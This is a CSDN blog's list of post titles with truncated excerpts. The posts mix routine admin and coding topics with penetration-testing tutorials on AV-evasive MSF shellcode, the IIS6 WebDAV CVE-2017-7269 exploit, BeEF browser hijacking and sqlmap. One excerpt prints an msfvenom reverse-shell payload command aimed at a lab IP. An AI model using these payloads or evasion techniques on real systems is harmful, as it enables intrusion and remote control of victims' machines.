MickeyMouse1928-CSDN博客

原创 windows环境探测程序

EnvirDetection(ftp版)PS：程序下载地址见本文末尾1.1搭建ftp服务器我们借助filezilla Server搭建FTP服务器：前往https://filezilla-project.org/download.php?type=server，下载最新...

2019-08-23 15:47:02 310

原创 centos安装LNMP+SSL证书

1、更新系统yum update -y2、重启reboot3、安装LNMP执行可以访问http://soft.vpser.net/lnmp查看最新版本，这里是nmp1.6-full.tar.gzwget -c http://soft.vpser.net/lnmp/lnmp1.6-full.tar.gz && tar zxf lnmp1.6-full.tar.gz...

2019-08-23 15:20:08 331

原创匹配任何国家电话号码正则表达式

(\+)?($)?(0{1,2})?(\-)?(1(\-)?\d{0,3}|[234689]\d{1,2}|5\d{1,2}(\-)?(\d)?|7)($)?(\-)?($)?(\d{1,4})?($)?(\-)?\d{3,14}$

2019-08-23 12:35:01 1084 1

转载 Web元素定位之CSS Selector

XPath与CSS Selector的差别上一篇文章中总结了web自动化测试中用xpath来进行元素定位的方法，那么CSS Selector又是什么鬼？其实，对于使用者来讲，哪个用的习惯就选哪个。总的来说，XPath更强大，而CSS选择器通常语法比较简洁，运行速度更快些。Target CSS 3 XPath所有元素 * //*所有的P元素 p //p所有的p元素的子元素 p &gt...

2018-04-26 10:56:02 417

Burp Suite抓HTTPS数据包（通用）测试环境[+] JDK1.8.0_40[+] Burp Suite 1.6.17下载地址：[+] JDK[+] Burp Suite 1.6.17一、burp介绍请自行参阅https://portswigger.net/burp/这里不过多介绍二、burp拦截HTTPS包的使用方法【以IE为例】1、配置浏览器代理（目前支持：IE、Firefox、Chr...

2018-04-26 10:52:51 7293 1

转载 Python:文本识别抛弃pytesser，直接使用Tesseract

本文最初写于2015年5月，最近Tesseract推出了3.05版，加入了一些新的特性；且原文存在一些纰漏，现重新编写。PyTesserPyTesser在Python Package Index中的版本仍为最初的2007年的0.0.1版，怀疑是不是已经不再维护。PyTesser似乎仅仅是在Tesseract的可执行程序tesseract.exe基础上写了一个面向Python的接口，就是通过shel...

2018-04-26 10:45:30 1839

转载 BIOS密码破解

参考：康轩文化.《2007 BIOS与注册表全攻略》〔M〕.四川出版集团，2017年2月第一版∶P76-78.BIOS 密码破解很多人因为忘记BIOS密码而不能进入CMOS设置，从而不能进入系统的大门，这对很多人来说是一件很悲哀的事情，其实，破解BIOS密码的方法有很多种。本文将主要介绍一些关于破解BIOS密码方面的实用技巧。1. 通过Debug 清除密码1.1软盘启动进入

2018-04-19 16:45:18 2320

转载大量破解密码的方法

在使用计算机的过程中，我们常常输入各类密码，各种密码设置很多都不一样。比如开机密码、QQ密码、文件密码等等，如果到你输入密码的时候突然忘记了这些密码，你该怎么处理。可能因为你的健忘导致你的电脑瘫痪，让你失去了客户，或者数据丢失，对你造成很大的损失。　　笔者总结了在电脑日常使用中必须要注意的地方，大家在遇到丢失密码的情况可以参照解决。　　一、破解CMOS SYSTEM密码

2018-04-19 16:19:43 4710 4

原创 Centos配置端口转发

1、修改/etc/sysctl.conf配置文件的net.ipv4.ip_forward = 1临时修改，修改过后就马上生效，但如果系统重启后则又恢复为默认值0echo 1 >/proc/sys/net/ipv4/ip_forward 永久修改打开vi/etc/sysctl.conf找到net.ipv4.ip_forward，将值修改为1sysctl –p（使之立即生效） 2、配置端口转发假...

2018-04-13 11:55:14 1192

原创基于ZoomEye钟馗之眼API的python脚本

# -*- coding: cp936 -*-import os import sys import requests page = 1#输入个人账号密码 user = '' passwd = ''#验证用户名密码，返回access_token def Check(): data_info = {'username' : user,'passwo

2017-05-23 22:00:44 5864

转载 Python中raw_input() 与 input()

这两个均是 python 的内建函数，通过读取控制台的输入与用户实现交互。但他们的功能不尽相同。举两个小例子。 1 >>> raw_input_A = raw_input("raw_input: ") 2 raw_input: abc 3 >>> input_A = input("Input: ") 4 Input: abc 5 6 Traceback (most rec

2017-05-23 21:13:48 488

转载 CURL常用命令

下载单个文件，默认将输出打印到标准输出中(STDOUT)中curl http://www.centos.org通过-o/-O选项保存下载的文件到指定的文件中：-o：将文件保存为命令行中指定的文件名的文件中-O：使用URL中默认的文件名保存文件到本地1 # 将文件下载到本地并命名为mygettext.html2 curl -o mygettext.html http

2017-05-23 12:03:05 329

转载 Ubuntu Server安装图形界面全过程

1、连接网络，你一定要确保网络通畅，如果你和我一样使用Wireless，那先找根网线插上，因为下面的安装都要通过网络下载组件的　　2、进入图形界面的命令是startX，敲击后会有安装xinit的提示。　　sudo apt-get install xinit 　　安装完，终端由黑色界面变成白底黑字。出现X型的鼠标指针。　　3、安装环境管理器　　如果你喜

2017-05-23 11:29:38 475

转载 Kali更新源&dpkg:处理软件包dradis (--configure)时出错

dpkg:处理软件包dradis (--configure)时出错！解决方案:1.将info文件夹更名%mv /var/lib/dpkg/info /var/lib/dpkg/info_old2.新建新的info文件夹%mkdir /var/lib/dpkg/info3.更新%apt-get update%apt-get -f install4.将上一步在inf

2017-05-18 15:26:08 2067

转载 Linux nc命令详解

NetCat，在网络工具中有“瑞士军刀”美誉，其有Windows和Linux的版本。因为它短小精悍（1.84版本也不过25k，旧版本或缩减版甚至更小）、功能实用，被设计为一个简单、可靠的网络工具，可通过TCP或UDP协议传输读写数据。同时，它还是一个网络应用Debug分析器，因为它可以根据需要创建各种不同类型的网络连接。一、版本通常的Linux发行版中都带有NetCat（简称nc），甚

2017-05-15 16:43:53 608

转载关于JavaScript中的方法是否加括号的问题

在我们js编写程序的时候，我们会写很多函数然后调用它们，那么这些函数调用的时候什么时候加()什么时候不加()？记住以下几个要点。（1）函数做参数时都不要括号。function fun(e) {alert(e); } function A(fun, e) { fun(e);} A(fun, 3);//弹出'3',函数fun当做实参传入另一个函数时，不加()（2）函数被调用

2017-05-12 12:58:05 616

转载基于事件的 JavaScript 编程：异步与同步

JavaScript的优势之一是其如何处理异步代码。异步代码会被放入一个事件队列，等到所有其他代码执行后才进行，而不会阻塞线程。然而，对于初学者来说，书写异步代码可能会比较困难。而在这篇文章里，我将会消除你可能会有的任何困惑。理解异步代码 JavaScript最基础的异步函数是setTimeout和setInterval。setTimeout会在一定时间后执行给定的函数。它接受一个回调

2017-05-12 12:52:17 504

转载 Ajax XMLHttpRequest对象的三个属性以及open和send方法

(1)onreadystatechange 属性onreadystatechange 属性存有处理服务器响应的函数。下面的代码定义一个空的函数，可同时对 onreadystatechange 属性进行设置：xmlHttp.onreadystatechange=function(){// 我们需要在这里写一些代码}(2)readyState 属性readyState 属性

2017-05-12 12:31:16 1317

转载 Sqlmap使用教程【超全】

sqlmap也是渗透中常用的一个注入工具，其实在注入工具方面，一个sqlmap就足够用了，只要你用的熟，秒杀各种工具，只是一个便捷性问题，sql注入另一方面就是手工党了，这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 sqlmap简介sqlmap支持五种不同的注入模式：1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。2、基于时间的

2017-05-11 10:55:12 7229 1

转载渗透测试工具sqlmap基础教程

转载请注明出处：http://blog.csdn.NET/zgyulongfei/article/details/41017493作者：羽龍飛本文仅献给想学习渗透测试的sqlmap小白，大牛请绕过。>>对于网络安全人员来说，掌握渗透工具的使用方法是一项必备的技能。然而，一个没有师傅带领的小白在刚开始学习时，并不知道该如何入手进行渗透学习，所以本文旨在帮助这些小白入门。

2017-05-11 10:33:15 770

转载 python 中name = 'main' 的作用

很多新手刚开始学习python的时候经常会看到python 中__name__ = \'__main__\' 这样的代码，可能很多新手一开始学习的时候都比较疑惑，python 中__name__ = '__main__' 的作用，到底干嘛的？有句话经典的概括了这段代码的意义：“Make a script both importable and executable”意思就是说让你写的脚

2017-05-05 16:23:55 419

转载合格的新手，应该知晓的工具！

SQLInjection:啊D 算是新手必用吧，比较简单，没有特别复杂的界面，一看就懂，批量扫描注入功能不错，配合搜索语法比较适合新手练手明小子比啊D多些功能，能够查询旁注，其中有个上传功能蛮不错的NBSI 这个软件对于SQLserver的注入有极高的准确率Pangolin 俗称穿山甲啊，比较好用的注入工具，虽然大牛们说1.3版以后Pangol

2017-05-05 10:00:38 1188

转载 phpcms V9 局域网访问问题

按下列步骤操作修改域名：1.打开caches\configs\system.php文件，然后批量替换里面的域名，如把http://127.0.0.1替换为您的新域名，如http://127.0.0.2,保存2.登陆后台，找到‘设置’-‘站点管理’-‘默认站点’，点击右边的“修改”，修改站点中的"站点域名"域名，然后保存。3.找到“内容”-附件管理-附件地址替换，把新访问地址修改为：

2017-05-04 22:00:37 617

转载 phpcms v9无法连接数据库服务器,请检查配置

原因：v9相关代码对提交的密码中特殊字符（如：&$^!@#）未进行escape转义处理。解决：1.修改install/step5.tpl.php 127行为：'&dbpw='+escape($('#dbpw').val())2.修改install/step6.tpl.php 55行为：var dbpw = escape('');

2017-05-04 19:07:08 1834 1

原创使用MSF生成的shellcode打造免杀payload

环境：1.Kali攻击机IP：192.168.114.1402.使用win7生成exe步骤：使用msfvenom生成shellcode ：msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f cwin7中使用Visual studio创建Win32控制台

2017-05-04 12:10:34 13288 2

原创针对IIS6.0 WebDAV漏洞(cve-2017-7269)制作纯字符数字的shellcode回连msf

环境：Kali攻击机1 IP：192.168.114.140Win7攻击机2 IP（安装gcc和python2.7）：192.168.114.130Windows server 2003目标主机（开启webdev服务）：192.168.114.132 在攻击机1中的操作：使用msfvenom生成shellcode ：msfvenom -pwindows/meterpre

2017-05-04 11:54:28 4751

转载 C语言执行shellcode的五种方法

//C语言执行shellcode的五种方法 #include #include //data段可读写 #pragma comment(linker, "/section:.data,RWE") //不显示窗口 #pragma comment(linker,"/subsystem:\"windo

2017-05-03 19:59:03 8407

转载 metasploit终端命令大全 MSF

Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，密码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。使用参数:show exploits列出metasploit框架中的所有渗透攻击模块。show

2017-05-03 10:38:33 1265

转载 Python：如何将字符串作为变量名

原文：http://blog.csdn.net/ztf312/一共三种方法：[python] view plain copy print?>>> var = "This is a string" >>> varName = 'var' >>> s= locals()[varName] >>> s 'This is a string' >>> s

2017-04-21 10:27:11 2277

转载如何让外网访问自己的本地Web服务器

目前很多网站开发者安装了IIS或者Apache等Web服务器，可以把自己电脑配置成一以路由为中心的内网服务器。本地服务器在内网测试是绰绰有余的，但是有些项目需要演示给异地的客户验收，而又赶不及把自己的网站放到服务器上面，这时我们就可以采用端口映射，让客户可以在外网访问我们的本地服务器(适合大部分的网站设计Soho工作者)。网络上面已经有很多软件可以实现这一功能，但是我今天要讲的是不依靠任何

2017-04-19 08:30:44 5236 1

转载内网渗透随想

0x00 前言之前看到微博有人私信我说内网渗透的技巧，zone也有很多小伙伴问了一些内网渗透的问题，所以我就斗胆写了这篇文章，有不对的，还请各位斧正整个内网渗透肯定不是一篇两篇文章能够讲述清楚的，所以标题写作随想，想到哪儿写哪儿 0x01 内网代理和转发＊简单区分一下正向代理和反向代理1.1 正向代理(Forward Proxy)Lhost－－》proxy－－

2017-04-17 10:09:26 1555

转载内网渗透使用代理访问内网

本文描述：渗透测试中，windows/Linux环境下，使用代理访问内网服务器。环境：本地Windows的IP: 172.18.5.26本地Linux的IP：172.18.5.116远程公网IP: 221.6.25.208远程公网221.6.25.208映射的内网服务器ip:172.20.1.3其中，可通过221.6.25.208:80端口提供的服务上传文件至

2017-04-16 18:00:56 2832

原创关于Python2.X与Python3.X的编码问题

关于Python2.X与Python3.X的编码问题一、Python2.X中的encode和decode 字符串在Python内部的表示是unicode编码，因此，在做编码转换时，通常需要以unicode作为中间编码，即先将其他编码的字符串解码（decode）成unicode，再从unicode编码（encode）成另一种编码。 decode的作用是

2017-04-14 09:43:32 2461

原创解决两个虚拟机网络适配器都为NAT模式，其中一台无法上网的情况

两个虚拟机网络适配器都为NAT模式，同时启动后，一个不能上网。出现这种情况是因为：其中一个虚拟机是另一个虚拟机整体复制过来的，导致其MAC地址一样。解决方案：1、编辑其中一台虚拟机的设置选项2、选择网络适配器，点击“高级”3、在MAC地址一栏选择生成4、点击确定即可

2017-04-11 15:22:24 7550 1

原创 Windows下python安装easy_install和pip&安装requests和BeautifulSoup库

Windows下python安装easy_install和pip并安装requests和BeautifulSoup 当我们使用Python爬取网页内容的时候往往需要用到requests和BeautifulSoup两个库一、安装easy_instal和pip1、前往bootstrap.pypa.io/get-pip.py下载get-pip.py2、将get-pip.py 放在P

2017-04-11 15:03:03 5629 1

转载 python 不是内部或外部命令解决方法

关于在Windows CMD 下运行Python：步骤： 1. 将Python的安装路径添加到环境变量中：首先找到你Python的安装路径：其次在你的‘计算机’中找到‘环境变量’：我电脑是window10的，计算机->属性->高级系统设置->环境变量->系统变量（s）->Path。接着将你的Python安装路径添加到Path最后，切记将该路径与Path中其他

2017-04-10 20:40:36 3594

原创 Metasploit中配置beef

Metasploit中配置beefcd /usr/share/beef-xss/打开beef-XSS目录下config.yaml文件leafpad config.yaml修改metasploit的false为true继续打开beef-XSS目录下extensions/metasploit文件夹cd extensions/metasploit/leaf

2017-04-08 15:16:50 1253

原创使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell

利用Beef劫持客户端浏览器环境：1．Kali（使用beef生成恶意代码，IP：192.168.114.140）2．一台web服务器（留言板存在XSS跨站脚本漏洞，IP：192.168.114.204）3. 客户端（用于访问web服务器，IP：192.168.114.130）步骤：1. Kali使用beef生成恶意代码2. 将恶意代码写入192.168.114.2

2017-04-08 14:13:51 24138 2

转载黑客攻击常用端口详解总结

黑客攻击常用端口详解总结1 FTP（文件传输协议）。 FTP 用于在您的计算机和其他计算机之间进行文件传输。仅当您在运行 FTP 服务器时，才应打开21端口！22 SSH。到该端口的 TCP 连接可能表示对 SSH 的搜索，SSH 有几个可利用的功能。 SSH 可安全替代 Telnet。 SSH 最常用于从服务器安全登录和复制文件。23 Telnet。 Te

2017-04-07 10:53:13 1292 2

转载 python之路 socket、socket server

一、socket socket的英文原义是“孔”或“插座”。作为BSD UNIX的进程通信机制，取后一种意思。通常也称作"套接字"，用于描述IP地址和端口，是一个通信链的句柄，可以用来实现不同虚拟机或不同计算机之间的通信。在Internet上的主机一般运行了多个服务软件，同时提供几种服务。每种服务都打开一个Socket，并绑定到一个端口上，不同的端口对应于不同的服务。Socket正如

2017-04-06 16:27:23 661